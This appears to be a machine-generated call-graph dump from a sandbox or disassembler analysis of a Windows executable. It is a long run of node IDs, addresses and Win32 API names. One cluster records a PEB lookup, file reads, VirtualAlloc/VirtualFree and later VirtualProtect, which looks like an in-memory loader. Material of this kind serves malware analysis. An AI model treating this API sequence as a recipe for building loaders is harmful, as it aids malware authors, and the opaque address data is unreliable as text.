94359->94361 94385 6051af 94360->94385 94361->94344 94363 61ec05 KillTimer SetTimer 94363->94361 94364 61ebc1 94364->94363 94365 673c7a Shell_NotifyIconW 94364->94365 94365->94363 94366->94347 94367->94344 94368->94344 94369->94334 94370->94341 94371->94357 94373 605027 _memset 94372->94373 94446 604c30 94373->94446 94376 6050ac 94378 6050ca Shell_NotifyIconW 94376->94378 94379 673d28 Shell_NotifyIconW 94376->94379 94380 6051af 50 API calls 94378->94380 94381 6050df 94380->94381 94381->94355 94382->94354 94383->94355 94384->94343 94386 6052a2 Mailbox 94385->94386 94387 6051cb 94385->94387 94386->94364 94388 606b0f 48 API calls 94387->94388 94389 6051d9 94388->94389 94390 673ca1 LoadStringW 94389->94390 94391 6051e6 94389->94391 94394 673cbb 94390->94394 94392 606a63 48 API calls 94391->94392 94393 6051fb 94392->94393 94393->94394 94395 60520c 94393->94395 94396 60510d 48 API calls 94394->94396 94397 605216 94395->94397 94398 6052a7 94395->94398 94401 673cc5 94396->94401 94407 60510d 94397->94407 94399 606eed 48 API calls 94398->94399 94404 605220 _memset _wcscpy 94399->94404 94401->94404 94416 60518c 94401->94416 94403 673ce7 94406 60518c 48 API calls 94403->94406 94405 605288 Shell_NotifyIconW 94404->94405 94405->94386 94406->94404 94408 671be7 94407->94408 94409 60511f 94407->94409 94435 63a58f 48 API calls _memcpy_s 94408->94435 94426 60b384 94409->94426 94412 60512b 94412->94404 94413 671bf1 94414 606eed 48 API calls 94413->94414 94415 671bf9 Mailbox 94414->94415 94417 605197 94416->94417 94418 671ace 94417->94418 94419 60519f 94417->94419 94421 606b4a 48 API calls 94418->94421 94436 605130 94419->94436 94423 671adb __wsetenvp 94421->94423 94422 6051aa 94422->94403 94424 61ee75 48 API calls 94423->94424 94425 671b07 _memcpy_s 94424->94425 94427 60b3c5 _memcpy_s 94426->94427 94428 60b392 94426->94428 94427->94412 94427->94427 94428->94427 94429 60b3b8 94428->94429 94430 60b3fd 94428->94430 94431 60bb85 48 API calls 94429->94431 94432 61f4ea 48 API calls 94430->94432 94431->94427 94433 60b407 94432->94433 94434 61f4ea 48 API calls 94433->94434 94434->94427 94435->94413 94437 60513f __wsetenvp 94436->94437 94438 671b27 94437->94438 94439 605151 94437->94439 94440 606b4a 48 API calls 94438->94440 94441 60bb85 48 API calls 94439->94441 94442 671b34 94440->94442 94443 60515e _memcpy_s 94441->94443 94444 61ee75 48 API calls 94442->94444 94443->94422 94445 671b57 _memcpy_s 94444->94445 94447 673c33 94446->94447 94448 604c44 94446->94448 94447->94448 94449 673c3c DestroyIcon 94447->94449 94448->94376 94450 645819 61 API calls _W_store_winword 94448->94450 94449->94448 94450->94376 94451 679bec 94486 610ae0 _memcpy_s Mailbox 94451->94486 94455 61f4ea 48 API calls 94477 60fec8 94455->94477 94456 610509 94550 64cc5c 86 API calls 4 library calls 94456->94550 94458 61146e 94463 606eed 48 API calls 94458->94463 94460 611473 94549 64cc5c 86 API calls 4 library calls 94460->94549 94462 67a246 94467 606eed 48 API calls 94462->94467 94481 60ffe1 Mailbox 94463->94481 94464 67a922 94467->94481 94469 606eed 48 API calls 94469->94477 94470 67a873 94471 60d7f7 48 API calls 94471->94477 94472 67a30e 94472->94481 94545 6397ed InterlockedDecrement 94472->94545 94473 6397ed InterlockedDecrement 94473->94477 94474 60ce19 48 API calls 94474->94486 94475 620f0a 52 API calls __cinit 94475->94477 94477->94455 94477->94456 94477->94458 94477->94460 94477->94462 94477->94469 94477->94471 94477->94472 94477->94473 94477->94475 94478 67a973 94477->94478 94477->94481 94482 6115b5 94477->94482 94542 611820 335 API calls 2 library calls 94477->94542 94543 611d10 59 API calls Mailbox 94477->94543 94551 64cc5c 86 API calls 4 library calls 94478->94551 94480 67a982 94548 64cc5c 86 API calls 4 library calls 94482->94548 94483 65e822 335 API calls 94483->94486 94484 60fe30 335 API calls 94484->94486 94485 67a706 94546 64cc5c 86 API calls 4 library calls 94485->94546 94486->94474 94486->94477 94486->94481 94486->94483 94486->94484 94486->94485 94488 611526 Mailbox 94486->94488 94489 61f4ea 48 API calls 94486->94489 94490 6397ed InterlockedDecrement 94486->94490 94494 660d09 94486->94494 94497 64b55b 94486->94497 94501 660d1d 94486->94501 94504 65f0ac 94486->94504 94536 64a6ef 94486->94536 94544 65ef61 82 API calls 2 library calls 94486->94544 94547 64cc5c 86 API calls 4 library calls 94488->94547 94489->94486 94490->94486 94552 65f8ae 94494->94552 94496 660d19 94496->94486 94498 64b564 94497->94498 94499 64b569 94497->94499 94638 64a4d5 94498->94638 94499->94486 94502 65f8ae 129 API calls 94501->94502 94503 660d2d 94502->94503 94503->94486 94505 60d7f7 48 API calls 94504->94505 94506 65f0c0 94505->94506 94507 60d7f7 48 API calls 94506->94507 94508 65f0c8 94507->94508 94509 60d7f7 48 API calls 94508->94509 94510 65f0d0 94509->94510 94511 60936c 81 API calls 94510->94511 94535 65f0de 94511->94535 94512 60c799 48 API calls 94512->94535 94513 606a63 48 API calls 94513->94535 94514 65f2cc 94515 65f2f9 Mailbox 94514->94515 94661 606b68 48 API calls 94514->94661 94515->94486 94517 65f2b3 94520 60518c 48 API calls 94517->94520 94518 65f2ce 94522 60518c 48 API calls 94518->94522 94519 606eed 48 API calls 94519->94535 94521 65f2c0 94520->94521 94525 60510d 48 API calls 94521->94525 94523 65f2dd 94522->94523 94526 60510d 48 API calls 94523->94526 94524 60bdfa 48 API calls 94528 65f175 CharUpperBuffW 94524->94528 94525->94514 94526->94514 94527 60bdfa 48 API calls 94529 65f23a CharUpperBuffW 94527->94529 94530 60d645 53 API calls 94528->94530 94660 61d922 55 API calls 2 library calls 94529->94660 94530->94535 94532 60936c 81 API calls 94532->94535 94533 60518c 48 API calls 94533->94535 94534 60510d 48 API calls 94534->94535 94535->94512 94535->94513 94535->94514 94535->94515 94535->94517 94535->94518 94535->94519 94535->94524 94535->94527 94535->94532 94535->94533 94535->94534 94537 64a6fb 94536->94537 94538 61f4ea 48 API calls 94537->94538 94539 64a709 94538->94539 94540 64a717 94539->94540 94541 60d7f7 48 API calls 94539->94541 94540->94486 94541->94540 94542->94477 94543->94477 94544->94486 94545->94481 94546->94488 94547->94481 94548->94481 94549->94470 94550->94464 94551->94480 94553 60936c 81 API calls 94552->94553 94554 65f8ea 94553->94554 94576 65f92c Mailbox 94554->94576 94588 660567 94554->94588 94556 65fb8b 94557 65fcfa 94556->94557 94561 65fb95 94556->94561 94624 660688 89 API calls Mailbox 94557->94624 94560 65fd07 94560->94561 94562 65fd13 94560->94562 94601 65f70a 94561->94601 94562->94576 94563 60936c 81 API calls 94582 65f984 Mailbox 94563->94582 94568 65fbc9 94615 61ed18 94568->94615 94571 65fbe3 94621 64cc5c 86 API calls 4 library calls 94571->94621 94572 65fbfd 94574 61c050 48 API calls 94572->94574 94577 65fc14 94574->94577 94575 65fbee GetCurrentProcess TerminateProcess 94575->94572 94576->94496 94578 611b90 48 API calls 94577->94578 94587 65fc3e 94577->94587 94580 65fc2d 94578->94580 94579 65fd65 94579->94576 94584 65fd7e FreeLibrary 94579->94584 94622 66040f 105 API calls _free 94580->94622 94581 611b90 48 API calls 94581->94587 94582->94556 94582->94563 94582->94576 94582->94582 94619 6629e8 48 API calls _memcpy_s 94582->94619 94620 65fda5 60 API calls 2 library calls 94582->94620 94584->94576 94587->94579 94587->94581 94623 60dcae 50 API calls Mailbox 94587->94623 94625 66040f 105 API calls _free 94587->94625 94589 60bdfa 48 API calls 94588->94589 94590 660582 CharLowerBuffW 94589->94590 94626 641f11 94590->94626 94594 60d7f7 48 API calls 94595 6605bb 94594->94595 94633 6069e9 48 API calls _memcpy_s 94595->94633 94597 6605d2 94598 60b18b 48 API calls 94597->94598 94599 6605de Mailbox 94598->94599 94600 66061a Mailbox 94599->94600 94634 65fda5 60 API calls 2 library calls 94599->94634 94600->94582 94602 65f725 94601->94602 94606 65f77a 94601->94606 94603 61f4ea 48 API calls 94602->94603 94605 65f747 94603->94605 94604 61f4ea 48 API calls 94604->94605 94605->94604 94605->94606 94607 660828 94606->94607 94608 660a53 Mailbox 94607->94608 94614 66084b _strcat _wcscpy __wsetenvp 94607->94614 94608->94568 94609 60cf93 58 API calls 94609->94614 94610 60d286 48 API calls 94610->94614 94611 60936c 81 API calls 94611->94614 94612 62395c 47 API calls std::exception::_Copy_str 94612->94614 94614->94608 94614->94609 94614->94610 94614->94611 94614->94612 94637 648035 50 API calls __wsetenvp 94614->94637 94616 61ed2d 94615->94616 94617 61edc5 VirtualProtect 94616->94617 94618 61ed93 94616->94618 94617->94618 94618->94571 94618->94572 94619->94582 94620->94582 94621->94575 94622->94587 94623->94587 94624->94560 94625->94587 94627 641f3b __wsetenvp 94626->94627 94628 641f79 94627->94628 94630 641f6f 94627->94630 94632 641ffa 94627->94632 94628->94594 94628->94599 94630->94628 94635 61d37a 60 API calls 94630->94635 94632->94628 94636 61d37a 60 API calls 94632->94636 94633->94597 94634->94600 94635->94630 94636->94632 94637->94614 94639 64a4ec 94638->94639 94651 64a5ee 94638->94651 94640 64a5d4 Mailbox 94639->94640 94642 64a58b 94639->94642 94644 64a4fd 94639->94644 94641 61f4ea 48 API calls 94640->94641 94657 64a54c _memcpy_s Mailbox 94641->94657 94643 61f4ea 48 API calls 94642->94643 94643->94657 94645 61f4ea 48 API calls 94644->94645 94656 64a51a 94644->94656 94645->94656 94646 64a555 94650 61f4ea 48 API calls 94646->94650 94647 64a545 94649 61f4ea 48 API calls 94647->94649 94648 61f4ea 48 API calls 94648->94651 94649->94657 94652 64a55b 94650->94652 94651->94499 94658 649d2d 48 API calls 94652->94658 94654 64a567 94659 61e65e 50 API calls 94654->94659 94656->94646 94656->94647 94656->94657 94657->94648 94658->94654 94659->94657 94660->94535 94661->94515 94662 d4c378 94676 d49fc8 94662->94676 94664 d4c480 94679 d4c268 94664->94679 94682 d4d4b8 GetPEB 94676->94682 94678 d4a653 94678->94664 94680 d4c271 Sleep 94679->94680 94681 d4c27f 94680->94681 94683 d4d4e2 94682->94683 94683->94678 94684 6719cb 94689 602322 94684->94689 94686 6719d1 94722 620f0a 52 API calls __cinit 94686->94722 94688 6719db 94690 602344 94689->94690 94723 6026df 94690->94723 94695 60d7f7 48 API calls 94696 602384 94695->94696 94697 60d7f7 48 API calls 94696->94697 94698 60238e 94697->94698 94699 60d7f7 48 API calls 94698->94699 94700 602398 94699->94700 94701 60d7f7 48 API calls 94700->94701 94702 6023de 94701->94702 94703 60d7f7 48 API calls 94702->94703 94704 6024c1 94703->94704 94731 60263f 94704->94731 94708 6024f1 94709 60d7f7 48 API calls 94708->94709 94710 6024fb 94709->94710 94760 602745 94710->94760 94712 602546 94713 602556 GetStdHandle 94712->94713 94714 6025b1 94713->94714 94715 67501d 94713->94715 94716 6025b7 CoInitialize 94714->94716 94715->94714 94717 675026 94715->94717 94716->94686 94767 6492d4 53 API calls 94717->94767 94719 67502d 94768 6499f9 CreateThread 94719->94768 94721 675039 CloseHandle 94721->94716 94722->94688 94769 602854 94723->94769 94726 606a63 48 API calls 94727 60234a 94726->94727 94728 60272e 94727->94728 94783 6027ec 6 API calls 94728->94783 94730 60237a 94730->94695 94732 60d7f7 48 API calls 94731->94732 94733 60264f 94732->94733 94734 60d7f7 48 API calls 94733->94734 94735 602657 94734->94735 94784 6026a7 94735->94784 94738 6026a7 48 API calls 94739 602667 94738->94739 94740 60d7f7 48 API calls 94739->94740 94741 602672 94740->94741 94742 61f4ea 48 API calls 94741->94742 94743 6024cb 94742->94743 94744 6022a4 94743->94744 94745 6022b2 94744->94745 94746 60d7f7 48 API calls 94745->94746 94747 6022bd 94746->94747 94748 60d7f7 48 API calls 94747->94748 94749 6022c8 94748->94749 94750 60d7f7 48 API calls 94749->94750 94751 6022d3 94750->94751 94752 60d7f7 48 API calls 94751->94752 94753 6022de 94752->94753 94754 6026a7 48 API calls 94753->94754 94755 6022e9 94754->94755 94756 61f4ea 48 API calls 94755->94756 94757 6022f0 94756->94757 94758 671fe7 94757->94758 94759 6022f9 RegisterWindowMessageW 94757->94759 94759->94708 94761 602755 94760->94761 94762 675f4d 94760->94762 94763 61f4ea 48 API calls 94761->94763 94789 64c942 50 API calls 94762->94789 94765 60275d 94763->94765 94765->94712 94766 675f58 94767->94719 94768->94721 94790 6499df 54 API calls 94768->94790 94776 602870 94769->94776 94772 602870 48 API calls 94773 602864 94772->94773 94774 60d7f7 48 API calls 94773->94774 94775 602716 94774->94775 94775->94726 94777 60d7f7 48 API calls 94776->94777 94778 60287b 94777->94778 94779 60d7f7 48 API calls 94778->94779 94780 602883 94779->94780 94781 60d7f7 48 API calls 94780->94781 94782 60285c 94781->94782 94782->94772 94783->94730 94785 60d7f7 48 API calls 94784->94785 94786 6026b0 94785->94786 94787 60d7f7 48 API calls 94786->94787 94788 60265f 94787->94788 94788->94738 94789->94766 94791 60f030 94792 613b70 335 API calls 94791->94792 94793 60f03c 94792->94793 94794 60b7b1 94803 60c62c 94794->94803 94796 60b7ec 94798 60ba85 48 API calls 94796->94798 94797 60b7c2 94797->94796 94799 60bc74 48 API calls 94797->94799 94802 60b6b7 Mailbox 94798->94802 94800 60b7e0 94799->94800 94801 60ba85 48 API calls 94800->94801 94801->94796 94811 60bcce 94803->94811 94805 6739fd 94817 6426bc 88 API calls 4 library calls 94805->94817 94807 673a0b 94808 60c63b 94808->94805 94809 60c68b 94808->94809 94810 60c799 48 API calls 94808->94810 94809->94797 94810->94808 94812 60bce8 94811->94812 94813 60bcdb 94811->94813 94814 61f4ea 48 API calls 94812->94814 94813->94808 94815 60bcf2 94814->94815 94816 61ee75 48 API calls 94815->94816 94816->94813 94817->94807 94818 d4c923 94819 d4c938 94818->94819 94820 d49fc8 GetPEB 94819->94820 94821 d4c944 94820->94821 94822 d4c962 94821->94822 94823 d4c9f8 94821->94823 94827 d4c608 94822->94827 94840 d4d2a8 9 API calls 94823->94840 94826 d4c9df 94828 d49fc8 GetPEB 94827->94828 94831 d4c6a7 94828->94831 94830 d4c6d8 CreateFileW 94830->94831 94832 d4c6e5 94830->94832 94831->94832 94833 d4c701 VirtualAlloc 94831->94833 94838 d4c808 CloseHandle 94831->94838 94839 d4c818 VirtualFree 94831->94839 94841 d4d518 GetPEB 94831->94841 94835 d4c8f4 VirtualFree 94832->94835 94836 d4c902 94832->94836 94833->94832 94834 d4c722 ReadFile 94833->94834 94834->94832 94837 d4c740 VirtualAlloc 94834->94837 94835->94836 94836->94826 94837->94831 94837->94832 94838->94831 94839->94831 94840->94826 94842 d4d542 94841->94842 94842->94830 94843 6719dd 94848 604a30 94843->94848 94845 6719f1 94868 620f0a 52 API calls __cinit 94845->94868 94847 6719fb 94849 604a40 __ftell_nolock 94848->94849 94850 60d7f7 48 API calls 94849->94850 94851 604af6 94850->94851 94869 605374 94851->94869 94853 604aff 94876 60363c 94853->94876 94856 60518c 48 API calls 94857 604b18 94856->94857 94882 6064cf 94857->94882 94860 60d7f7 48 API calls 94861 604b32 94860->94861 94888 6049fb 94861->94888 94863 604b43 Mailbox 94863->94845 94864 60ce19 48 API calls 94866 604b3d _wcscat Mailbox __wsetenvp 94864->94866 94865 6064cf 48 API calls 94865->94866 94866->94863 94866->94864 94866->94865 94867 6061a6 48 API calls 94866->94867 94867->94866 94868->94847 94902 62f8a0 94869->94902 94872 60ce19 48 API calls 94873 6053a7 94872->94873 94904 60660f 94873->94904 94875 6053b1 Mailbox 94875->94853 94877 603649 __ftell_nolock 94876->94877 94915 60366c GetFullPathNameW 94877->94915 94879 60365a 94880 606a63 48 API calls 94879->94880 94881 603669 94880->94881 94881->94856 94883 60651b 94882->94883 94887 6064dd _memcpy_s 94882->94887 94885 61f4ea 48 API calls 94883->94885 94884 61f4ea 48 API calls 94886 604b29 94884->94886 94885->94887 94886->94860 94887->94884 94889 60bcce 48 API calls 94888->94889 94890 604a0a RegOpenKeyExW 94889->94890 94891 6741cc RegQueryValueExW 94890->94891 94892 604a2b 94890->94892 94893 674246 RegCloseKey 94891->94893 94894 6741e5 94891->94894 94892->94866 94895 61f4ea 48 API calls 94894->94895 94896 6741fe 94895->94896 94897 6047b7 48 API calls 94896->94897 94898 674208 RegQueryValueExW 94897->94898 94899 674224 94898->94899 94900 67423b 94898->94900 94901 606a63 48 API calls 94899->94901 94900->94893 94901->94900 94903 605381 GetModuleFileNameW 94902->94903 94903->94872 94905 62f8a0 __ftell_nolock 94904->94905 94906 60661c GetFullPathNameW 94905->94906 94907 606a63 48 API calls 94906->94907 94908 606643 94907->94908 94911 606571 94908->94911 94912 60657f 94911->94912 94913 60b18b 48 API calls 94912->94913 94914 60658f 94913->94914 94914->94875 94916 60368a 94915->94916 94916->94879 94917 67197b 94922 61dd94 94917->94922 94921 67198a 94923 61f4ea 48 API calls 94922->94923 94924 61dd9c 94923->94924 94925 61ddb0 94924->94925 94930 61df3d 94924->94930 94929 620f0a 52 API calls __cinit 94925->94929 94929->94921 94931 61df46 94930->94931 94932 61dda8 94930->94932 94962 620f0a 52 API calls __cinit 94931->94962 94934 61ddc0 94932->94934 94935 60d7f7 48 API calls 94934->94935 94936 61ddd7 GetVersionExW 94935->94936 94937 606a63 48 API calls 94936->94937 94938 61de1a 94937->94938 94963 61dfb4 94938->94963 94941 606571 48 API calls 94943 61de2e 94941->94943 94945 6724c8 94943->94945 94967 61df77 94943->94967 94946 61dea4 GetCurrentProcess 94976 61df5f LoadLibraryA GetProcAddress 94946->94976 94947 61debb 94949 61df31 GetSystemInfo 94947->94949 94950 61dee3 94947->94950 94951 61df0e 94949->94951 94970 61e00c 94950->94970 94953 61df21 94951->94953 94954 61df1c FreeLibrary 94951->94954 94953->94925 94954->94953 94956 61df29 GetSystemInfo 94959 61df03 94956->94959 94957 61def9 94973 61dff4 94957->94973 94959->94951 94961 61df09 FreeLibrary 94959->94961 94961->94951 94962->94932 94964 61dfbd 94963->94964 94965 60b18b 48 API calls 94964->94965 94966 61de22 94965->94966 94966->94941 94977 61df89 94967->94977 94981 61e01e 94970->94981 94974 61e00c 2 API calls 94973->94974 94975 61df01 GetNativeSystemInfo 94974->94975 94975->94959 94976->94947 94978 61dea0 94977->94978 94979 61df92 LoadLibraryA 94977->94979 94978->94946 94978->94947 94979->94978 94980 61dfa3 GetProcAddress 94979->94980 94980->94978 94982 61def1 94981->94982 94983 61e027 LoadLibraryA 94981->94983 94982->94956 94982->94957 94983->94982 94984 61e038 GetProcAddress 94983->94984 94984->94982 94985 6719ba 94990 61c75a 94985->94990 94989 6719c9 94991 60d7f7 48 API calls 94990->94991 94992 61c7c8 94991->94992 94998 61d26c 94992->94998 94994 61c865 94996 61c881 94994->94996 95001 61d1fa 48 API calls _memcpy_s 94994->95001 94997 620f0a 52 API calls __cinit 94996->94997 94997->94989 95002 61d298 94998->95002 95001->94994 95003 61d28b 95002->95003 95004 61d2a5 95002->95004 95003->94994 95004->95003 95005 61d2ac RegOpenKeyExW 95004->95005 95005->95003 95006 61d2c6 RegQueryValueExW 95005->95006 95007 61d2e7 95006->95007 95008 61d2fc RegCloseKey 95006->95008 95007->95008 95008->95003 95009 678eb8 95013 64a635 95009->95013 95011 678ec3 95012 64a635 84 API calls 95011->95012 95012->95011 95015 64a642 95013->95015 95020 64a66f 95013->95020 95014 64a671 95025 61ec4e 81 API calls 95014->95025 95015->95014 95017 64a676 95015->95017 95015->95020 95022 64a669 95015->95022 95018 60936c 81 API calls 95017->95018 95019 64a67d 95018->95019 95021 60510d 48 API calls 95019->95021 95020->95011 95021->95020 95024 614525 61 API calls _memcpy_s 95022->95024 95024->95020 95025->95017 95026 625dfd 95027 625e09 _wprintf 95026->95027 95063 627eeb GetStartupInfoW 95027->95063 95029 625e0e 95065 629ca7 GetProcessHeap 95029->95065 95031 625e66 95032 625e71 95031->95032 95150 625f4d 47 API calls 3 library calls 95031->95150 95066 627b47 95032->95066 95035 625e77 95036 625e82 __RTC_Initialize 95035->95036 95151 625f4d 47 API calls 3 library calls 95035->95151 95087 62acb3 95036->95087 95039 625e91 95040 625e9d GetCommandLineW 95039->95040 95152 625f4d 47 API calls 3 library calls 95039->95152 95106 632e7d GetEnvironmentStringsW 95040->95106 95043 625e9c 95043->95040 95047 625ec2 95119 632cb4 95047->95119 95050 625ec8 95051 625ed3 95050->95051 95154 62115b 47 API calls 3 library calls 95050->95154 95133 621195 95051->95133 95054 625edb 95055 625ee6 __wwincmdln 95054->95055 95155 62115b 47 API calls 3 library calls 95054->95155 95137 603a0f 95055->95137 95058 625efa 95059 625f09 95058->95059 95156 6213f1 47 API calls _doexit 95058->95156 95157 621186 47 API calls _doexit 95059->95157 95062 625f0e _wprintf 95064 627f01 95063->95064 95064->95029 95065->95031 95158 62123a 30 API calls 2 library calls 95066->95158 95068 627b4c 95159 627e23 InitializeCriticalSectionAndSpinCount 95068->95159 95070 627b51 95071 627b55 95070->95071 95161 627e6d TlsAlloc 95070->95161 95160 627bbd 50 API calls 2 library calls 95071->95160 95074 627b5a 95074->95035 95075 627b67 95075->95071 95076 627b72 95075->95076 95162 626986 95076->95162 95079 627bb4 95170 627bbd 50 API calls 2 library calls 95079->95170 95082 627b93 95082->95079 95084 627b99 95082->95084 95083 627bb9 95083->95035 95169 627a94 47 API calls 4 library calls 95084->95169 95086 627ba1 GetCurrentThreadId 95086->95035 95088 62acbf _wprintf 95087->95088 95089 627cf4 __lock 47 API calls 95088->95089 95090 62acc6 95089->95090 95091 626986 __calloc_crt 47 API calls 95090->95091 95093 62acd7 95091->95093 95092 62ad42 GetStartupInfoW 95100 62ae80 95092->95100 95103 62ad57 95092->95103 95093->95092 95094 62ace2 _wprintf @_EH4_CallFilterFunc@8 95093->95094 95094->95039 95095 62af44 95179 62af58 LeaveCriticalSection _doexit 95095->95179 95097 62aec9 GetStdHandle 95097->95100 95098 626986 __calloc_crt 47 API calls 95098->95103 95099 62aedb GetFileType 95099->95100 95100->95095 95100->95097 95100->95099 95102 62af08 InitializeCriticalSectionAndSpinCount 95100->95102 95101 62ada5 95101->95100 95104 62add7 GetFileType 95101->95104 95105 62ade5 InitializeCriticalSectionAndSpinCount 95101->95105 95102->95100 95103->95098 95103->95100 95103->95101 95104->95101 95104->95105 95105->95101 95107 625ead 95106->95107 95108 632e8e 95106->95108 95113 632a7b GetModuleFileNameW 95107->95113 95180 6269d0 47 API calls std::exception::_Copy_str 95108->95180 95111 632eb4 _memcpy_s 95112 632eca FreeEnvironmentStringsW 95111->95112 95112->95107 95114 632aaf _wparse_cmdline 95113->95114 95115 625eb7 95114->95115 95116 632ae9 95114->95116 95115->95047 95153 62115b 47 API calls 3 library calls 95115->95153 95181 6269d0 47 API calls std::exception::_Copy_str 95116->95181 95118 632aef _wparse_cmdline 95118->95115 95120 632ccd __wsetenvp 95119->95120 95124 632cc5 95119->95124 95121 626986 __calloc_crt 47 API calls 95120->95121 95129 632cf6 __wsetenvp 95121->95129 95122 632d4d 95123 621c9d _free 47 API calls 95122->95123 95123->95124 95124->95050 95125 626986 __calloc_crt 47 API calls 95125->95129 95126 632d72 95127 621c9d _free 47 API calls 95126->95127 95127->95124 95129->95122 95129->95124 95129->95125 95129->95126 95130 632d89 95129->95130 95182 632567 47 API calls __cftof2_l 95129->95182 95183 626e20 IsProcessorFeaturePresent 95130->95183 95132 632d95 95132->95050 95134 6211a1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 95133->95134 95136 6211e0 __IsNonwritableInCurrentImage 95134->95136 95198 620f0a 52 API calls __cinit 95134->95198 95136->95054 95138 671ebf 95137->95138 95139 603a29 95137->95139 95140 603a63 IsThemeActive 95139->95140 95199 621405 95140->95199 95144 603a8f 95211 603adb SystemParametersInfoW SystemParametersInfoW 95144->95211 95146 603a9b 95212 603d19 95146->95212 95148 603aa3 SystemParametersInfoW 95149 603ac8 95148->95149 95149->95058 95150->95032 95151->95036 95152->95043 95156->95059 95157->95062 95158->95068 95159->95070 95160->95074 95161->95075 95164 62698d 95162->95164 95165 6269ca 95164->95165 95166 6269ab Sleep 95164->95166 95171 6330aa 95164->95171 95165->95079 95168 627ec9 TlsSetValue 95165->95168 95167 6269c2 95166->95167 95167->95164 95167->95165 95168->95082 95169->95086 95170->95083 95172 6330b5 95171->95172 95176 6330d0 __calloc_impl 95171->95176 95173 6330c1 95172->95173 95172->95176 95178 627c0e 47 API calls __getptd_noexit 95173->95178 95174 6330e0 HeapAlloc 95174->95176 95177 6330c6 95174->95177 95176->95174 95176->95177 95177->95164 95178->95177 95179->95094 95180->95111 95181->95118 95182->95129 95184 626e2b 95183->95184 95189 626cb5 95184->95189 95188 626e46 95188->95132 95190 626ccf _memset __call_reportfault 95189->95190 95191 626cef IsDebuggerPresent 95190->95191 95197 6281ac SetUnhandledExceptionFilter UnhandledExceptionFilter 95191->95197 95193 62a70c __fltout2 6 API calls 95195 626dd6 95193->95195 95194 626db3 __call_reportfault 95194->95193 95196 628197 GetCurrentProcess TerminateProcess 95195->95196 95196->95188 95197->95194 95198->95136 95200 627cf4 __lock 47 API calls 95199->95200 95201 621410 95200->95201 95264 627e58 LeaveCriticalSection 95201->95264 95203 603a88 95204 62146d 95203->95204 95205 621491 95204->95205 95206 621477 95204->95206 95205->95144 95206->95205 95265 627c0e 47 API calls __getptd_noexit 95206->95265 95208 621481 95266 626e10 8 API calls __cftof2_l 95208->95266 95210 62148c 95210->95144 95211->95146 95213 603d26 __ftell_nolock 95212->95213 95214 60d7f7 48 API calls 95213->95214 95215 603d31 GetCurrentDirectoryW 95214->95215 95267 6061ca 95215->95267 95217 603d57 IsDebuggerPresent 95218 603d65 95217->95218 95219 671cc1 MessageBoxA 95217->95219 95220 671cd9 95218->95220 95221 603d82 95218->95221 95250 603e3a 95218->95250 95219->95220 95382 61c682 48 API calls 95220->95382 95341 6040e5 95221->95341 95222 603e41 SetCurrentDirectoryW 95225 603e4e Mailbox 95222->95225 95225->95148 95226 671ce9 95231 671cff SetCurrentDirectoryW 95226->95231 95231->95225 95250->95222 95264->95203 95265->95208 95266->95210 95384 61e99b 95267->95384 95271 6061eb 95272 605374 50 API calls 95271->95272 95273 6061ff 95272->95273 95274 60ce19 48 API calls 95273->95274 95275 60620c 95274->95275 95401 6039db 95275->95401 95277 606216 Mailbox 95278 606eed 48 API calls 95277->95278 95279 60622b 95278->95279 95413 609048 95279->95413 95282 60ce19 48 API calls 95283 606244 95282->95283 95284 60d6e9 55 API calls 95283->95284 95285 606254 Mailbox 95284->95285 95286 60ce19 48 API calls 95285->95286 95287 60627c 95286->95287 95288 60d6e9 55 API calls 95287->95288 95289 60628f Mailbox 95288->95289 95290 60ce19 48 API calls 95289->95290 95291 6062a0 95290->95291 95292 60d645 53 API calls 95291->95292 95293 6062b2 Mailbox 95292->95293 95294 60d7f7 48 API calls 95293->95294 95295 6062c5 95294->95295 95416 6063fc 95295->95416 95299 6062df 95300 6062e9 95299->95300 95301 671c08 95299->95301 95302 620fa7 _W_store_winword 59 API calls 95300->95302 95303 6063fc 48 API calls 95301->95303 95304 6062f4 95302->95304 95305 671c1c 95303->95305 95304->95305 95306 6062fe 95304->95306 95307 6063fc 48 API calls 95305->95307 95308 620fa7 _W_store_winword 59 API calls 95306->95308 95309 671c38 95307->95309 95310 606309 95308->95310 95312 605374 50 API calls 95309->95312 95310->95309 95311 606313 95310->95311 95313 620fa7 _W_store_winword 59 API calls 95311->95313 95314 671c5d 95312->95314 95315 60631e 95313->95315 95316 6063fc 48 API calls 95314->95316 95317 60635f 95315->95317 95319 671c86 95315->95319 95323 6063fc 48 API calls 95315->95323 95320 671c69 95316->95320 95318 60636c 95317->95318 95317->95319 95326 61c050 48 API calls 95318->95326 95321 606eed 48 API calls 95319->95321 95322 606eed 48 API calls 95320->95322 95325 671ca8 95321->95325 95327 671c77 95322->95327 95324 606342 95323->95324 95328 606eed 48 API calls 95324->95328 95329 6063fc 48 API calls 95325->95329 95330 606384 95326->95330 95331 6063fc 48 API calls 95327->95331 95332 606350 95328->95332 95333 671cb5 95329->95333 95334 611b90 48 API calls 95330->95334 95331->95319 95335 6063fc 48 API calls 95332->95335 95333->95333 95338 606394 95334->95338 95335->95317 95336 611b90 48 API calls 95336->95338 95338->95336 95339 6063fc 48 API calls 95338->95339 95340 6063d6 Mailbox 95338->95340 95432 606b68 48 API calls 95338->95432 95339->95338 95340->95217 95342 6040f2 __ftell_nolock 95341->95342 95343 67370e _memset 95342->95343 95344 60410b 95342->95344 95346 67372a GetOpenFileNameW 95343->95346 95345 60660f 49 API calls 95344->95345 95347 604114 95345->95347 95348 673779 95346->95348 95475 6040a7 95347->95475 95350 606a63 48 API calls 95348->95350 95352 67378e 95350->95352 95352->95352 95382->95226 95385 60d7f7 48 API calls 95384->95385 95386 6061db 95385->95386 95387 606009 95386->95387 95388 606016 __ftell_nolock 95387->95388 95389 606a63 48 API calls 95388->95389 95394 60617c Mailbox 95388->95394 95390 606048 95389->95390 95399 60607e Mailbox 95390->95399 95433 6061a6 95390->95433 95392 60614f 95393 60ce19 48 API calls 95392->95393 95392->95394 95396 606170 95393->95396 95394->95271 95395 60ce19 48 API calls 95395->95399 95397 6064cf 48 API calls 95396->95397 95397->95394 95398 6064cf 48 API calls 95398->95399 95399->95392 95399->95394 95399->95395 95399->95398 95400 6061a6 48 API calls 95399->95400 95400->95399 95402 6041a9 136 API calls 95401->95402 95403 6039fe 95402->95403 95404 603a06 95403->95404 95436 64c396 95403->95436 95404->95277 95407 672ff0 95409 621c9d _free 47 API calls 95407->95409 95408 604252 84 API calls 95408->95407 95410 672ffd 95409->95410 95411 604252 84 API calls 95410->95411 95412 673006 95411->95412 95412->95412 95414 61f4ea 48 API calls 95413->95414 95415 606237 95414->95415 95415->95282 95417 606406 95416->95417 95418 60641f 95416->95418 